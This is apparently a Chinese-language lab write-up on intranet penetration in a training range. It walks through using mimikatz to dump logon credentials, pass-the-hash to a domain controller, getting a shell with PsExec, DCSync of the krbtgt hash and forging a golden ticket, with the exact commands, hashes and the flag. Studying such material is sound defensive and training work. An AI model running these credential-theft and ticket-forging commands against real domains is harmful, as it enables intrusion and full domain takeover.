内网渗透（下）

在局域网内寻找在域内的主机

1. 根据靶场提示，通过mstsc远程桌面连接c78exn-5qmtbw.aqlab.cn:12781进入主机10.0.1.4
2. 根据systeminfo发现该主机不在域内
3. 通过上一节课，连接10.0.1.8进入目标主机，发现该主机在zkaq.cn的域内

   寻找域控

4. 通过进入10.0.1.8的IPV4配置发现dns服务器地址为10.0.1.6，因为域控主机的域名和dns设置都是设置在本机上的，所以域控的主机地址就是10.0.1.6
5. 在10.0.1.8的主机上传入猕猴桃，获取登录的域控用户名和密码（在目标服务器上，运行指令log开启日志，运行指令privilege::debug进行提权，运行sekurlsa::logonpasswords抓取登录该主机的用户名及密码），但是由于打了补丁，所以抓不到明文密码，但发现了密文密码域控主机名为dc，用户名为administrator，域名为zkaq.cn，而加密的密文NTLM为：61465a991b168727b65b3644aab823cd

获取域控主机的控制权

1. 可以通过猕猴桃的哈希传递的方式，来与域控主机进行通讯sekurlsa::pth /user:administrator /domain:"zkaq.cn" /ntlm:61465a991b168727b65b3644aab823cd
2. 输入指令dir \\dc.zkaq.cn\c$来查看域内名为dc的主机的c盘文件,证明已经获取和dc域控主机通信的权限
3. 用微软开发的软件PsExec.exe获取域控主机的cmd，从刚才获取权限的cmd中，输入指令为.(绝对路径)PsExec.exe \\dc.zkaq.cn cmd
4. 用域控的cmd加入用户名rocky，并且加入管理员组，具体方法太简单就不表述了
5. 用rocky账号登录10.0.1.6域控主机，在administrator.dc用户的桌面中发flag:flag{qiuqiuni,biedabajile}

黄金票据

1. 依旧是使用猕猴桃，在任意域内的主机内都可以做票据
2. lsadump::dcsync /user:krbtgt 抓域控特殊账户密码:
   • sid是S-1-5-21-4098506371-3349406080-1400905760
   • 密文密码是：9f7afad7acc9f72b7e338b908795b7da
     
3. 做出黄金票据kerberos::golden /admin:administrator /domain:zkaq.cn /sid:S-1-5-21-4098506371-3349406080-1400905760 /krbtgt:9f7afad7acc9f72b7e338b908795b7da /ticket:567.kiribi(注意，空格不能少)
4. 加载票据kerberos::ptt 567.kiribi
   
5. 在10.0.1.8主机上加载完票据，然后使用PsExec.exe \\dc.zkaq.cn cmd获取目标主机cmd，然后就又可以增加用户来远程登录域控主机了